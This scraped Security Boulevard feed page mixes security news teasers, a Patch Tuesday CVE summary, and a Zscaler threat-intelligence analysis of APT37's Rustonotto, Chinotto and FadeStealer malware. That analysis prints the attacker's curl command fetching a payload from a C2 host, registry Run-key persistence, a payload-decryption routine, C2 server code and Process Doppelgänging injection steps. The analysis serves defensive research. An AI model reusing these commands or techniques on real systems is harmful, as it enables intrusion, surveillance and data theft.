Security Boulevard

The post 10 Questions CISOs Should Be Asking About File Security appeared first on Votiro.

The post 10 Questions CISOs Should Be Asking About File Security appeared first on Security Boulevard.

Contrast customers get certainty in moments when everyone else is guessing. When a code dependency supply-chain attack hits, they do not waste hours asking if they might be exposed. They know immediately whether their applications are running compromised code, and they can act with confidence.

The post How ADR Secures Against NPM Supply Chain Attacks | Application Detection and Response | Contrast Security appeared first on Security Boulevard.

Cisco at its Splunk .conf conference today added a series of artificial intelligence (AI) agents to its cybersecurity portfolio in addition to now making two editions of the Splunk Enterprise platform available. Ryan Fetterman, senior manager for AI security research at the Foundation AI arm of Cisco, said AI agents will play a significant role..

The post Cisco Adds Bevy of AI Agents to Splunk Security Platform appeared first on Security Boulevard.

SaaS supply chain attacks exploit SaaS-to-SaaS connections using stolen OAuth tokens. Get practical steps to reduce your risk and protect business data.

The post How New Supply Chain Attacks Challenge SaaS Security: Lessons from UNC6395, UNC6040, and ShinyHunters appeared first on AppOmni.

The post How New Supply Chain Attacks Challenge SaaS Security: Lessons from UNC6395, UNC6040, and ShinyHunters appeared first on Security Boulevard.

Creator, Author and Presenter: Rob King

Our deep appreciation to Security BSides - San Francisco and the Creators, Authors and Presenters for publishing their BSidesSF 2025 video content on YouTube. Originating from the conference’s events held at the lauded CityView / AMC Metreon - certainly a venue like no other; and via the organization's YouTube channel.

Additionally, the organization is welcoming volunteers for the BSidesSF Volunteer Force, as well as their Program Team & Operations roles. See their succinct BSidesSF 'Work With Us' page, in which, the appropriate information is to be had!

Permalink

The post BSidesSF 2025: There And Back Again: Discovering OT Devices Across Protocol Gateways appeared first on Security Boulevard.

By integrating SonarQube's industry-leading automated code review with JFrog's new AppTrust governance platform, together we are providing the essential framework for software engineering teams to embrace AI-driven speed without compromising on control.

The post Analysis evidence from SonarQube now available in JFrog AppTrust appeared first on Security Boulevard.

By integrating SonarQube's industry-leading automated code review with JFrog's new AppTrust governance platform, together we are providing the essential framework for software engineering teams to embrace AI-driven speed without compromising on control.

The post Analysis evidence from SonarQube now available in JFrog AppTrust appeared first on Security Boulevard.

1. 8Critical
2. 72Important
3. 0Moderate
4. 0Low

Microsoft addresses 80 CVEs, including eight flaws rated critical with one publicly disclosed.

Microsoft addresses 80 CVEs in its September 2025 Patch Tuesday release, with eight rated critical, and 72 rated important. Our counts omitted one vulnerability reported by VulnCheck.

This month’s update includes patches for:

• Azure Arc
• Azure Windows Virtual Machine Agent
• Capability Access Management Service (camsvc)
• Graphics Kernel
• Microsoft AutoUpdate (MAU)
• Microsoft Brokering File System
• Microsoft Graphics Component
• Microsoft High Performance Compute Pack (HPC)
• Microsoft Office
• Microsoft Office Excel
• Microsoft Office PowerPoint
• Microsoft Office SharePoint
• Microsoft Office Visio
• Microsoft Office Word
• Microsoft Virtual Hard Drive
• Role: Windows Hyper-V
• SQL Server
• Windows Ancillary Function Driver for WinSock
• Windows BitLocker
• Windows Bluetooth Service
• Windows Connected Devices Platform Service
• Windows DWM
• Windows Defender Firewall Service
• Windows Imaging Component
• Windows Internet Information Services
• Windows Kernel
• Windows Local Security Authority Subsystem Service (LSASS)
• Windows Management Services
• Windows MapUrlToZone
• Windows MultiPoint Services
• Windows NTFS
• Windows NTLM
• Windows PowerShell
• Windows Routing and Remote Access Service (RRAS)
• Windows SMB
• Windows SMBv3 Client
• Windows SPNEGO Extended Negotiation
• Windows TCP/IP
• Windows UI XAML Maps MapControlSettings
• Windows UI XAML Phone DatePickerFlyout
• Windows Win32K GRFX
• Xbox

Elevation of Privilege (EoP) vulnerabilities accounted for 47.5% of the vulnerabilities patched this month, followed by Remote Code Execution (RCE) vulnerabilities at 27.5%.

Important CVE-2025-55234 | Windows SMB Elevation of Privilege Vulnerability

CVE-2025-55234 is an EoP vulnerability affecting Windows Server Message Block (SMB). It was assigned a CVSSv3 score of 8.8 and rated as important. Successful exploitation would allow an unauthenticated attacker to elevate their privileges to that of the compromised user's account. According to Microsoft, this vulnerability was publicly disclosed prior to a patch being made available.

CVE-2025-55234 appears to have been released to help customers audit and assess their environment and identify incompatibility issues prior to utilizing some of the hardening capabilities for SMB Servers.

CVE-2025-55234 is the fifth Windows SMB vulnerability patched in 2025 and the third Windows SMB EoP disclosed this year. In the June 2025 Patch Tuesday release, Microsoft patched CVE-2025-33073, another publicly disclosed Windows SMB EoP vulnerability. A day after the June 2025 Patch Tuesday release, researchers from RedTeam Pentesting GmbH, one of many researchers credited with reporting the flaw to Microsoft, released a blog post detailing the vulnerability, including proof-of-concept details.

Critical CVE-2025-54918 | Windows NTLM Elevation of Privilege Vulnerability

CVE-2025-54918 is an EoP vulnerability in Windows New Technology LAN Manager (NTLM). It was assigned a CVSSv3 score of 8.8 and is rated critical. It was assessed as “Exploitation More Likely” according to Microsoft’s Exploitability Index. According to the advisory, successful exploitation would allow an attacker to elevate their privileges to SYSTEM.

This is the second month in a row that a critical NTLM EoP vulnerability was patched and the third in 2025. In the August 2025 Patch Tuesday release, Microsoft patched CVE-2025-53778, and CVE-2025-21311 in the January 2025 Patch Tuesday release.

Important CVE-2025-54916 | Windows NTFS Remote Code Execution Vulnerability

CVE-2025-54916 is a RCE in Microsoft Windows New Technology File System (NTFS). It was assigned a CVSSv3 score of 7.8 and is rated important and assessed as “Exploitation More Likely.” An attacker that successfully exploits this flaw would gain RCE on the targeted system. According to the advisory, any authenticated attacker could leverage this vulnerability.

Since 2022, the bulk of NTFS vulnerabilities patched across Patch Tuesday have been EoP or Information Disclosure vulnerabilities. However, this is the second NTFS RCE vulnerability since 2022 and the second in 2025. The first, CVE-2025-24993, patched in the March 2025 Patch Tuesday release, was exploited in the wild as a zero-day.

Critical CVE-2025-54910 | Microsoft Office Remote Code Execution Vulnerability

CVE-2025-54910 is a RCE in Microsoft Office. It was assigned a CVSSv3 score of 8.4 and is rated critical and assessed as “Exploitation Less Likely.” An attacker could exploit this vulnerability by convincing a target to open a specially crafted Office document. Additionally, the advisory notes that exploitation is possible through Microsoft Outlook’s Preview Pane. Successful exploitation would grant the attacker RCE privileges on the target system. For users of Microsoft Office LTSC for Mac 2021 and 2024, the advisory states that updates are not yet available, but will be released soon.

Important CVE-2025-54897 | Microsoft SharePoint Remote Code Execution Vulnerability

CVE-2025-54897 is a RCE vulnerability in Microsoft SharePoint. It was assigned a CVSSv3 score of 8.8 and is rated important and assessed as “Exploitation Less Likely.” In order to exploit this flaw, an attacker would need to be authenticated as any user and privileged accounts, such as admin or other elevated privileges are not necessary to exploit this flaw. Once authenticated, an attacker could either write arbitrary code or use code injection to execute code on a vulnerable SharePoint Server to gain RCE.

Critical CVE-2025-55224 | Windows Hyper-V Remote Code Execution Vulnerability

CVE-2025-55224 is a RCE in Windows Hyper-V. It was assigned a CVSSv3 score of 7.8, rated as critical and assessed as “Exploitation Less Likely.” According to the advisory, an attacker who is able to win a race condition could traverse from the guest hosts security boundary in order to execute arbitrary code on the Hyper-V host machine. While the attack complexity for this vulnerability is high, the impact would be significant for an attacker who is able to successfully exploit this vulnerability.

Important CVE-2025-54091, CVE-2025-54092, CVE-2025-54098, CVE-2025-54115 | Windows Hyper-V Elevation of Privilege Vulnerabilities

CVE-2025-54091, CVE-2025-54092, CVE-2025-54098, CVE-2025-54115 are EoP vulnerabilities in Windows Hyper-V, Microsoft’s virtualization product. CVE-2025-54091, CVE-2025-54092, CVE-2025-54098 were assigned a CVSSv3 score of 7.8 while CVE-2025-54115 was assigned a CVSSv3 score of 7.0. CVE-2025-54098 was assessed as “Exploitation More Likely” while the remaining three flaws were assessed as “Exploitation Less Likely.”

A local, authenticated attacker could exploit these vulnerabilities to elevate to SYSTEM privileges, though in order to exploit CVE-2025-54115, an attacker would first need to win a race condition, which is what contributed to its lower CVSS score.

Tenable Solutions

A list of all the plugins released for Microsoft’s September 2025 Patch Tuesday update can be found here. As always, we recommend patching systems as soon as possible and regularly scanning your environment to identify those systems yet to be patched.

For more specific guidance on best practices for vulnerability assessments, please refer to our blog post on How to Perform Efficient Vulnerability Assessments with Tenable.

Get more information

• Microsoft's September 2025 Security Updates
• Tenable plugins for Microsoft September 2025 Patch Tuesday Security Updates

Join Tenable's Research Special Operations (RSO) Team on the Tenable Community.
Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.202X Patch Tuesday release.

The post Microsoft’s September 2025 Patch Tuesday Addresses 80 CVEs (CVE-2025-55234) appeared first on Security Boulevard.

Key Takeaways For years, European companies have faced a patchwork of national laws pushing them to take responsibility for human rights and environmental issues tied to their business operations. France passed its Duty of Vigilance law in 2017. Germany followed with the EU Supply Chain Act in 2021. Each aimed to hold companies accountable not […]

The post Understanding the EU Corporate Sustainability Due Diligence Directive (CSDDD): Why It Matters and How to Prepare appeared first on Centraleyes.

The post Understanding the EU Corporate Sustainability Due Diligence Directive (CSDDD): Why It Matters and How to Prepare appeared first on Security Boulevard.

O que o FireMon Insights revela sobre o risco da política de firewall e como corrigi-lo O gerenciamento de firewall é o herói não celebrado (ou vilão oculto) da segurança...

The post 60% falham. Você é um deles? appeared first on Security Boulevard.

A sophisticated npm supply chain attack compromised popular packages

The post NPM Supply Chain Attack: Sophisticated Multi-Chain Cryptocurrency Drainer Infiltrates Popular Packages appeared first on Security Boulevard.

Preventive tech isn’t about counting steps anymore. It’s about who owns the future of human performance. The difference between a scrappy prototype and an enterprise-grade...Read More

The post Scaling Preventive Tech: From Startup Prototype to Enterprise-Grade Wellness Platform appeared first on ISHIR | Software Development India.

The post Scaling Preventive Tech: From Startup Prototype to Enterprise-Grade Wellness Platform appeared first on Security Boulevard.

via the comic artistry and dry wit of Randall Munroe, creator of XKCD

Permalink

The post Randall Munroe’s XKCD ‘Cesium’ appeared first on Security Boulevard.

The Chinese state-sponsored group APT41 is accused of using a fake email impersonating a U.S. representative containing spyware and sent to government agencies, trade groups, and laws firms to gain information about U.S. strategy in trade talks with China.

The post Chinese Group Accused of Using Fake U.S. Rep. Email to Spy on Trade Talks appeared first on Security Boulevard.

UltraViolet Cyber has acquired the application security testing services arm of Black Duck Software as part of an effort to expand the scope of the managed security services it provides. Company CEO Ira Goldstein said this addition to its portfolio will provide penetration testing, red teaming, threat modeling, cloud and container risk assessments, architecture risk..

The post UltraViolet Cyber Acquires Application Security Testing Service from Black Duck appeared first on Security Boulevard.

Creator, Author and Presenter: Clint Gibler

Our deep appreciation to Security BSides - San Francisco and the Creators, Authors and Presenters for publishing their BSidesSF 2025 video content on YouTube. Originating from the conference’s events held at the lauded CityView / AMC Metreon - certainly a venue like no other; and via the organization's YouTube channel.

Additionally, the organization is welcoming volunteers for the BSidesSF Volunteer Force, as well as their Program Team & Operations roles. See their succinct BSidesSF 'Work With Us' page, in which, the appropriate information is to be had!

Permalink

The post BSidesSF 2025: Sharing Vulnerabilities appeared first on Security Boulevard.

42% of developer time goes to fixing tech debt instead of building features. Knight Capital lost $460M in one day due to unaddressed code issues. Here's why smart companies fix P0/P1 problems first, and the framework that helped me scale startups without constant firefighting.

The post Tech Debt: Why Fixing the Foundation Comes Before Building the Castle appeared first on Security Boulevard.

Zero Trust isn’t just a strategy. It’s a survival skill. “Never trust, always verify” sounds simple enough, but most organizations discover that applying it to sprawling hybrid networks is anything...

The post How to Embrace Zero Trust Without Blowing Up Your Network appeared first on Security Boulevard.

IntroductionAPT37 (also known as ScarCruft, Ruby Sleet, and Velvet Chollima) is a North Korean-aligned threat actor active since at least 2012. APT37 primarily targets South Korean individuals connected to the North Korean regime or involved in human rights activism, leveraging custom malware and adopting emerging technologies.In recent campaigns, APT37 utilizes a single command-and-control (C2) server to orchestrate all components of their malware arsenal, including a Rust-based backdoor that ThreatLabz dubbed Rustonotto (also known as CHILLYCHINO), a PowerShell-based malware known as Chinotto, and FadeStealer. Rustonotto is a newly identified backdoor in use since June 2025. Chinotto is a well-documented PowerShell backdoor that has been in use since 2019. FadeStealer, first discovered in 2023, is a surveillance tool that records keystrokes, captures screenshots and audio, monitors devices and removable media, and exfiltrates data via password-protected RAR archives.In this blog post, Zscaler ThreatLabz delves into the tactics and tools used by APT37. The technical analysis explores APT37's sophisticated tactics, including spear phishing, Compiled HTML Help (CHM) file delivery, and Transactional NTFS (TxF) for stealthy code injection.Key TakeawaysAPT37 is a North Korean-aligned threat actor active since at least 2012 that primarily targets individuals connected to the North Korean regime or involved in human rights activism.In recent campaigns, APT37 utilizes a single command-and-control (C2) server to orchestrate all components of their malware arsenal, including the Rust-based backdoor we named Rustonotto, the PowerShell-based Chinotto malware, and FadeStealer.FadeStealer, first identified in 2023, is a surveillance tool designed to log keystrokes, capture screenshots and audio, track devices and removable media, and exfiltrate data through password-protected RAR archives. FadeStealer leverages HTTP POST and Base64 encoding for communication with its command-and-control (C2) server.APT37 utilizes Windows shortcut files and Windows help files as initial infection vectors.Rustonotto, active since June 2025, is a Rust-compiled malware, representing the first known instance of APT37 leveraging Rust-based malware to target Windows systems.Using simple backdoors in the initial stage, the threat actor deployed FadeStealer via a Python-based infection chain.OverviewS2W published a comprehensive report on the same threat actor, detailing PubNub-based communication malware and the deployment of VCD ransomware. In this blog post, ThreatLabz expands on these findings and highlights the infection chain observed, along with the C2 operations that orchestrate the full tradecraft of this threat actor.ThreatLabz’s latest findings suggest that APT37 utilized the Rust programming language to create a lightweight backdoor we named Rustonotto, which has basic functionality for executing Windows commands and sending the results to a threat actor-controlled server. While Rustonotto may appear simplistic, the use of Rust highlights the group's ongoing effort to adopt modern languages and potentially support multi-platform attacks. APT37 also employed a Python-based loader implementing the Process Doppelgänging code injection technique to deploy a custom-built stealer designed for data exfiltration.ThreatLabz collaborated with the Korea National Police Agency (KNPA) by providing technical analysis to support their investigation of APT37.Technical Analysis Attack chainThreatLabz reconstructed the APT37 infection chain that begins with an initial compromise via a Windows shortcut or a Windows help file, followed by Chinotto dropping FadeStealer through a sophisticated infection process. The attack chain is depicted in the figure below.Figure 1: Full infection chain involving Chinotto, Rustonotto, and FadeStealer.Windows shortcut and RustonottoIn one campaign, APT37 utilizes a Windows shortcut file. When this shortcut file (MD5: b9900bef33c6cc9911a5cd7eeda8e093) is launched, a malicious PowerShell script, Chinotto, is invoked that extracts an embedded decoy and payload using predefined markers. The steps outlined below detail the infection process initiated when the victim executes Chinotto.Scans %temp% and the current working directory for its own Windows shortcut file, validating its exact size (6,032,787 bytes) to ensure the correct file is processed.Reads the Windows shortcut, converts the byte values to ASCII, and extracts two hex-encoded payloads delimited by the markers AEL (first payload start), BEL (second payload start), and EOF (end of file marker).Converts the first hex payload to binary and writes it as C:\ProgramData\NKView.hwp, then launches it as a decoy document.Decodes the second payload and writes it as C:\ProgramData\3HNoWZd.exe, which functions as the main executable.Creates a scheduled task named MicrosoftUpdate, configured to execute 3HNoWZd.exe every 5 minutes using schtasks.The decoy document is a Hangul Word Processor (HWP) file titled “Two Perspectives on North Korea in South Korean Society”, which was last modified on June 11, 2025.Figure 2: Example decoy document dropped by an APT37 Windows shortcut file.The dropped payload is Rustonotto, which is a Rust-compiled binary (MD5 7967156e138a66f3ee1bfce81836d8d0). Rustonotto receives Base64-encoded Windows commands and returns the execution results also in a Base64-encoded format. The steps below illustrate the sequence of Rustonotto’s behavior, specifically focusing on its C2 communication.Establishes an HTTP connection to the C2 server with the U= HTTP query parameter.Makes HTTP requests to the C2 server to fetch commands.Executes the commands received.Captures the command output and sends the result back to the C2 server with the R= HTTP query parameter.Windows help file and PowerShell-based payloadIn another campaign, the threat actor used a Windows help file (CHM) to deliver malware, a method that ThreatLabz has observed APT37 use before. In this case, the victim was sent a RAR file named 2024-11-22.rar. Inside the RAR archive were two files: a password-protected ZIP archive called KT그룹 채용 (translated as KT Job Description) and a malicious Windows help file named Password.chm. (which was disguised as a document containing the password for the ZIP archive). The malicious CHM file, when opened, creates a registry value under the Run key to trigger the download and execution of an HTML Application (HTA) file from the threat actor’s server each time the current user logs on. The example below shows how the CHM file is configured to perform this action: The HTA file (1.html) downloaded by the CHM contains a malicious PowerShell script that acts as a backdoor, allowing the threat actor to control the infected computer remotely. The backdoor known as Chinotto is capable of performing various tasks, such as transferring files, executing commands, modifying the registry, creating scheduled tasks, and more. When Chinotto launches, it creates a unique victim identifier by combining the computer name and the username, which Chinotto uses when communicating with the C2 server. Chinotto connects to the same C2 server URL previously associated with Rustonotto.To avoid running the malware more than once on the same machine, Chinotto generates a file named %TEMP%\jMwVrHdPtpv as an execution marker. Every 5 seconds, Chinotto checks the threat actor’s C2 server for new instructions via HTTP POST requests, sending the victim ID (formatted as U=[victim ID]). Chinotto then receives commands from the server, which are Base64 decoded, and executed on the infected system. The table below shows the commands supported by Chinotto, along with their description.CommandsDescriptionFINFOCollects file information (name, size, timestamps, path) from a specified directory, saves it to a CSV file, and uploads the CSV to the C2 server.DIRUPCompresses the contents of a specified directory into a ZIP archive and uploads the ZIP to the C2 server.SFILEUploads a specified file to the C2 server.DOWNFDownloads a file from a given URL and saves it to a specified path.CURLCUses curl to download a file from a URL and saves it to a specified path.REGEDModifies the Windows registry at a specified location, setting the name and value.TASKACreates a scheduled task to run a specified command at regular intervals.ZIPEXExtracts the contents of a ZIP archive to a specified destination.RENAMRenames a specified file or directory.DELETDeletes a specified file or directory.Table 1: Commands supported by the Chinotto backdoor.When Chinotto completes execution, it sends a Base64-encoded done message back to the C2 server with the R= HTTP query parameter.Transacted injectionThe threat actor's hands-on-keyboard activities with the implanted Chinotto variant involved delivering malicious payloads packaged in Microsoft Cabinet (.CAB) files. These payloads, equipped with Python-based launchers, were extracted and executed upon delivery. The commands used to deliver and execute the payloads are outlined in the table below.Delivered commandsDescriptioncurl http://[redacted]/images/test/wonder.dat -o "c:\programdata\wonder.cab"Fetches the Microsoft Cabinet (CAB) file payload from the C2 server.expand c:\programdata\wonder.cab -F:* c:\programdataExtracts the contents of the .CAB file to the specified directory.del /f /q c:\programdata\wonder.cabDeletes the .CAB file to remove evidence.reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v TeleUpdate /d "c:\programdata\tele_update\tele_update.exe c:\programdata\tele_update\tele.conf c:\programdata\tele_update\tele.dat" /fAdds a registry entry to enable automatic execution at system startup or login.c:\programdata\telegram_update\tele_update.exe c:\programdata\telegram_update\tele.conf c:\programdata\telegram_update\tele.datLaunches FadeStealer with its associated configuration and data files.Table 2: Example APT37 commands executed to deliver FadeStealer.Each file executed during the threat actor’s hands-on-keyboard activity includes three components: A legitimate Python module (tele_update.exe).A compiled Python module (tele.conf) that decrypts and loads FadeStealer from a file named tele.dat.The FadeStealer payload (tele.dat), Base64-encoded and XOR encrypted.The compiled Python module, created on 2025-04-01 05:42:03, is internally named TransactedHollowing.py, suggesting the use of a technique for stealthily injecting and executing arbitrary code within a legitimate Windows process.The script is designed to process a single input file containing a Base64-encoded payload. The script decodes the payload and applies a custom XOR-based decryption routine to extract a Windows executable. The decrypted executable is intended for injection into a target process. The following code demonstrates the decryption routine used to unpack the payload.def decrypt_custom_encoded_file(file_path):
try:
# Open the file in binary mode and read its content
with open(file_path, "rb") as file:
encoded_data = file.read()

# Decode the content from base64
decoded_data = base64.b64decode(encoded_data)

# Read offset and update it
offset = decoded_data[0]
offset += 1

# Get key length and update offset
key_length = decoded_data[offset]
offset += 1

# Extract the XOR key
xor_key = decoded_data[offset : offset + key_length]
offset += key_length

# Decrypt the rest of the data using XOR with the key
decrypted = bytes([
decoded_data[i] ^ xor_key[(i - offset) % key_length]
for i in range(offset, len(decoded_data))
])

return decrypted After unpacking the original payload, the Python script employs the Process Doppelgänging technique to inject the payload into a legitimate Windows process. The technique involves the following steps:Transacted file creation and section object setupThe script uses Windows Transactional NTFS (TxF) APIs (e.g., CreateFileTransactedW) to create a new file within a transaction context.The decrypted Portable Executable (PE) payload is written to the transacted file.The function NtCreateSection is called to create a memory section object, using the transacted file as the backing store for the payload's memory.The transaction is rolled back (RollbackTransaction), while preserving the section object in memory.The temporary file handle is closed, and the file is deleted, leaving no trace of the payload on disk.Suspended process creationThe script randomly selects a legitimate Windows system executable from a predefined list. Examples include: calc.exe, msinfo32.exe, svchost.exe, GamePanel.exe, UserAccountControlSettings.exe, and control.exe.The script creates a new process associated with the chosen executable in a suspended state.Section mapping, context manipulation, and executionThe section object containing the payload is mapped into the address space of the suspended process using NtMapViewOfSection.The script modifies the thread context of the suspended process (via GetThreadContext / SetThreadContext or their Wow64 equivalents) to redirect execution to the payload's entry point.The Process Environment Block (PEB) of the target process is updated to reflect the new image base address associated with the injected payload.The main thread of the process is resumed (ResumeThread), triggering the execution of the injected payload.The decrypted malware is FadeStealer, the same data-theft tool previously documented by AhnLab. FadeStealer periodically gathers files from the infected system, compresses them into password-protected RAR archives, and transmits them to a C2 server. When launched, FadeStealer creates working directories under the %TEMP%\VSTelems_Fade\ folder. FadeStealer has two main functions: automatically exfiltrating sensitive files and sending specific files as directed by commands specified by the threat actor. FadeStealer file stealing commandsOnce connected to the C2 server, FadeStealer receives Base64-encoded commands specifying a file path and a search pattern, separated by the | character. These commands direct the malware to gather target files based on the criteria provided. After collecting the files, FadeStealer creates a timestamped RAR archive (e.g., data_YYYY_MM_DD-HH_MM_SS.rar) and sends it back to the C2 server. Some example commands are listed below:CommandDescription C:\Users\|*.docCollect all Word documents from the Users directory.C:\Documents\|*.*Collect all files from the Documents folder.D:\|*.pdfCollect all PDF files from the D: drive.Table 3: Example commands supported by FadeStealer.FadeStealer surveillanceIn surveillance mode, FadeStealer operates multiple threads, each dedicated to monitoring and collecting specific types of data from the infected system. These threads function independently to capture keystrokes, screenshots, audio recordings, and file content from connected devices.In the table below, the capabilities, collection frequency, file naming patterns, and storage locations of the malware are listed.CapabilitiesFrequencyFiles CollectedDirectoryRecords all keystrokesReal-timekey_YYYY_MM_DD.log%TEMP%\VSTelems_Fade\NgenPdbk\Captures screen imagesEvery 30 secYYYY_MM_DD-HH_MM_SS.jpg%TEMP%\VSTelems_Fade\NgenPdbc\Records microphone audio5-min sessionsYYYY_MM_DD-HH_MM_SS.wav%TEMP%\VSTelems_Fade\NgenPdbm\Monitors for USB devicesEvery 1 hourusb_YYYY_MM_DD-HH_MM_SS.rar%TEMP%\VSTelems_FadeOut\Monitors cameras/portable devicesEvery 1 hour[DeviceName]_YYYY_MM_DD-HH_MM_SS.rar%TEMP%\VSTelems_FadeIn\Table 4: Surveillance capabilities and corresponding files associated with FadeStealer. FadeStealer compiles all the collected data into a RAR archive every hour, using a naming format like watch_YYYY_MM_DD-HH_MM_SS.rar. This archive includes files stored in the main directory (%TEMP%\VSTelems_Fade\), which contain keylogging data, screenshots, audio recordings, and captured files. A separate thread is responsible for uploading these archives to the C2 server.To ensure timely exfiltration, another thread actively monitors and identifies archived RAR files every 10 seconds, sending them to the C2 server upon detection.In the table below, the source directories, archive types, and the contents of the collected data are outlined.Source DirectoryArchive TypesContent%TEMP%\VSTelems_Fade\watch_YYYY_MM_DD-HH_MM_SS.rarHourly surveillance data consolidated (keylogging, screenshots, audio).%TEMP%\VSTelems_FadeOut\usb_YYYY_MM_DD-HH_MM_SS.rarUSB device contents collected when inserted.%TEMP%\VSTelems_FadeIn\[DeviceName]_YYYY_MM_DD-HH_MM_SS.rarMTP-enabled devices such as smartphones, cameras, and media player contents gathered during monitoring.Any locationdata_YYYY_MM_DD-HH_MM_SS.rarFiles collected via remote commands.Table 5: Filenames and paths used for surveillance by FadeStealer.When sending files, FadeStealer uses HTTP POST requests with multipart form data, specifying myboundary as the boundary name. Additionally, when creating a RAR archive, FadeStealer utilizes the hardcoded password NaeMhq[d]q to encrypt the RAR content and employs a custom RAR.exe tool extracted from its embedded resources.C2 serverThe threat actor leveraged vulnerable web servers to act as C2 servers for managing malware operations. The C2 PHP script used by APT37 is a lightweight and file-based backend, facilitating communication between the threat actor and the malware implants. The C2 server enables command delivery, result collection, and file uploads, all organized within a single JSON file (info).Using this simple yet effective script, the threat actor controlled the entire suite of malware tools used in the campaign. This included Rustonotto, Chinotto, and FadeStealer, all of which utilized the same Base64-encoded format for communication. While some malware variants featured slight differences in command structures, the C2 server PHP script provided unified and streamlined control over the entire malware toolset. The figure below illustrates how the C2 server functioned as a central hub for delivering commands, collecting results, and handling uploads across the different malware components in the campaign.Figure 3: APT37 C2 server architecture for Rustonotto, Chinotto, and FadeStealer.The APT37 C2 server maintains two arrays: a parent array for storing results received from the malware implant and a child array for storing commands issued by the threat actor. The code sample below demonstrates how the APT37 C2 server initializes its operation.…
if (!file_exists("info"))
{
   file_put_contents("info", '{"parent" : [{"id" : "", "text" : ""}], "child" : [{"id" : "", "text" : ""}]}');
}
$jsonStored = '';
$jsonStored = json_decode(file_get_contents("info"));
…The APT37 C2 server handles incoming HTTP requests differently depending on whether they originate from the threat actor or the malware implant. Requests are processed based on specific types and associated parameters, as outlined in the table below.Request TypeParameterDescriptionGET/POSTU=parentWhen the threat actor sends the query string U=parent, the C2 sends back the entire parent array, containing results from the clients. After delivering the response, the C2 resets the parent array to empty.GETU=&C=When the threat actor issues a command for a specific client, the Base64-encoded command is decoded and stored in the child array under the client’s ID. If the entry already exists, it is updated; otherwise, a new entry is created. The command is delivered to the client during its next poll and then cleared from the store.POSTU=&R=When a client sends back a result, the result is Base64-decoded and stored in the parent array under the client’s ID. If the entry already exists, it is updated; otherwise, a new entry is created. The threat actor can later retrieve these results using the query string U=parent.POSTU=&_file=When a client uploads a file, it is saved in the current directory with a filename prefixed by the client’s ID. The final filename format is _. If the file already exists, the data is appended.GET/POSTU=When a client polls for commands without sending a result or file, the script checks the child array for pending commands. If a command is found, it is delivered and cleared. If no command exists, the script checks the parent array. If no result is present, it responds with a default handshake message ("SEVMTw==", Base64 for "HELLO").Table 6: APT37 C2 server HTTP parameters and their corresponding purposes.The threat actor retrieves exfiltrated files from the compromised machine by issuing a direct GET request to the C2 server, leveraging prior knowledge of the client ID and the specific file name.
Victim ProfileOur findings revealed that several victims of this attack were located in South Korea. While the exact identities of the victims remain unclear due to limited available information, they do not appear to be associated with enterprises or government organizations. Based on the decoy content employed in the attack, ThreatLabz assesses with medium confidence that the intended targets include individuals linked to the North Korean regime or involved in South Korean political and/or diplomatic affairs.ConclusionAPT37 continues to prove its adaptability and proficiency by utilizing advanced tools and tactics to achieve its objectives. By incorporating new technologies alongside refined social engineering techniques, the group is able to effectively exfiltrate sensitive information and conduct targeted surveillance on individuals of interest. This malware cluster leveraged by APT37 has demonstrated persistent activity over the years and continues to undergo regular improvements.Zscaler CoverageZscaler’s multilayered cloud security platform detects indicators related to APT37's campaign at various levels.  The figure below depicts the Zscaler Cloud Sandbox, showing detection details for this threat.Figure 4: Zscaler Cloud Sandbox report for FadeStealer.In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to this threat at various levels with the following threat names:Win32.Backdoor.ChinottoWin32.Trojan.Apt37.LZWin32.Downloader.FadeStealerIndicators Of Compromise (IOCs)MD5File nameb9900bef33c6cc9911a5cd7eeda8e093N/A7967156e138a66f3ee1bfce81836d8d03HNoWZd.exe.bin77a70e87429c4e552649235a9a2cf11awonder.dat04b5e068e6f0079c2c205a42df8a3a84tele.confd2b34b8bfafd6b17b1cf931bb3fdd3dbtele.dat3d6b999d65c775c1d27c8efa615ee5202024-11-22.rar89986806a298ffd6367cf43f36136311Password.chm4caa44930e5587a0c9914bda9d240acc1.html MITRE ATT&CK FrameworkIDTacticDescriptionT1566.001Phishing: Spearphishing AttachmentThe threat actor delivers a malicious archive file to victims via spear phishing.T1059.003Command and Scripting Interpreter: Windows Command ShellThe Windows commands are launched by the CHM file when the Chinotto malware is delivered to the victim.T1059.007Command and Scripting Interpreter: JavaScriptThe JavaScript embedded HTA file is launched at the initial stage of the infection.T1053.005Scheduled Task/Job: Scheduled TaskA Windows Task Scheduler entry named MicrosoftUpdate was created for persistence using a malicious shortcut fileT1204.001User Execution: Malicious LinkThe malicious Windows shortcut file was delivered to the victim.T1547.001Boot or Logon Autostart Execution: Registry Run Keys / Startup FolderThe malicious CHM file creates a Run registry named OnedriveStandaloneUpdater for persistence.T1055.013Process Injection: Process DoppelgängingUsing Python code, the malware injects malicious code into the legitimate process using Windows Transactional NTFS (TxF).T1036.003Masquerading: Rename Legitimate UtilitiesThe legitimate Python module was renamed as tele_update.exe.T1036.004Masquerading: Masquerade Task or ServiceThe malware creates Windows services or registry keys that impersonate legitimate services, such as OneDrive or Windows Update.T1218.005System Binary Proxy Execution: MshtaThe malware exploits mshta.exe to execute malicious .hta files as a proxy.T1056.001Input Capture: KeyloggingFadeStealer collects the user's key strokes.T1113Screen CaptureFadeStealer takes screenshots of the victim’s screen.T1123Audio CaptureFadeStealer records microphone audio.T1025Data from Removable MediaFadeStealer collects files from connected removable media devices.T1560.001Archive Collected Data: Archive via UtilityFadeStealer uses an embedded RAR utility to collect and compress data for exfiltration.T1071.001Application Layer Protocol: Web ProtocolsRustonotto, Chinotto, and FadeStealer use HTTP communication for backdoor operations.T1132.001Data Encoding: Standard EncodingRustonotto and Chinotto use Base64 encoding when sending data.T1041Exfiltration Over C2 ChannelFadeStealer exfiltrates collected data through the C2 channel.

The post APT37 Targets Windows with Rust Backdoor and Python Loader appeared first on Security Boulevard.

Each Monday, the Tenable Exposure Management Academy provides the practical, real-world guidance you need to shift from vulnerability management to exposure management. In this post, we look back on the guidance and best practices shared in the past several months. You can read the entire Exposure Management Academy series here.

Let’s look back at key takeaways from the Exposure Management Academy over the past several months, including ones that address: 

• Attack surface management and visibility
• The shift in mindset required to move to proactive exposure management
• Exposure context and prioritization based on business impact
• Fostering a culture of shared responsibility for managing and remediating exposures

Attack surface visibility and management

Consider this question that you’re bound to get several times a week (if not daily): Where are we exposed? To provide an answer, you need a complete understanding of your organization’s attack surface, including all possible entry points that a threat actor could use to launch an attack. 

